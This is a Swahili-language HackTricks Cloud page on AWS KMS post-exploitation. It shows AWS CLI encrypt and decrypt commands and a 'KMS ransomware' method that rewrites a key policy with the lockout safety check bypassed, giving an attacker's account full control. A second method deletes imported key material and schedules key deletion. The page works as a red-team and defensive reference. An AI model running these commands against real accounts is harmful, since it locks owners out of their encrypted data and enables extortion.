Swahili - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - KMS Post Exploitation

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

KMS

Kwa habari zaidi angalia:

pageAWS - KMS Enum

Ficha/Funua habari

  • Kutumia funguo simetrik

# Encrypt data
aws kms encrypt \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--output text \
--query Plaintext | base64 \
--decode

  • Kutumia funguo ya asimetriki:

# Encrypt data
aws kms encrypt \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--output text \
--query Plaintext | base64 \
--decode

KMS Ransomware

Mshambuliaji mwenye ufikiaji wa haki juu ya KMS anaweza kubadilisha sera ya KMS ya funguo na kumpa akaunti yake ufikiaji juu yao, kuondoa ufikiaji uliopewa akaunti halali.

Kisha, watumiaji wa akaunti halali hawataweza kupata habari yoyote ya huduma yoyote iliyofichwa na funguo hizo, ikiumba ransomware rahisi lakini yenye ufanisi juu ya akaunti.

Tafadhali kumbuka kwamba funguo zilizosimamiwa na AWS hazitaathiriwa na shambulio hili, ni funguo zilizosimamiwa na Mteja tu.

Pia tafadhali kumbuka umuhimu wa kutumia param --bypass-policy-lockout-safety-check (ukosefu wa chaguo hili kwenye konsoli ya wavuti hufanya shambulio hili iwezekane tu kutoka kwa CLI).

# Force policy change
aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \
--policy-name default \
--policy file:///tmp/policy.yaml \
--bypass-policy-lockout-safety-check

{
"Id": "key-consolepolicy-3",
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<your_own_account>:root"
},
"Action": "kms:*",
"Resource": "*"
}
]
}

Tafadhali kumbuka kwamba ukibadilisha sera hiyo na kumpa ufikiaji kwa akaunti ya nje, kisha kutoka kwa akaunti hii ya nje jaribu kuweka sera mpya ya kumpa ufikiaji kwa akaunti ya awali, hautaweza.

KMS Ransomware ya Kijenetiki

KMS Ransomware ya Kimataifa

Kuna njia nyingine ya kutekeleza KMS Ransomware ya kimataifa, ambayo ingehusisha hatua zifuatazo:

  • Unda ufunguo mpya na vifaa vya ufunguo vilivyoingizwa na mshambuliaji

  • Kuweka upya data za zamani zilizoandikwa kwa toleo la awali na lile jipya.

  • Futa ufunguo wa KMS

  • Sasa ni mshambuliaji pekee, ambaye ana vifaa vya ufunguo wa awali, anaweza kufanikiwa kufichua data iliyofichwa

# Destoy they key material previously imported making the key useless
aws kms delete-imported-key-material --key-id 1234abcd-12ab-34cd-56ef-1234567890ab

# Schedule the destoy of a key (min wait time is 7 days)
aws kms schedule-key-deletion \
--key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \
--pending-window-in-days 7

Tafadhali kumbuka kwamba AWS sasa inazuia hatua za awali kufanywa kutoka kwenye akaunti nyingine:

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya HackTricks AWS)!

Njia nyingine za kusaidia HackTricks:

PreviousAWS - IAM Post ExploitationNextAWS - Lambda Post Exploitation

Last updated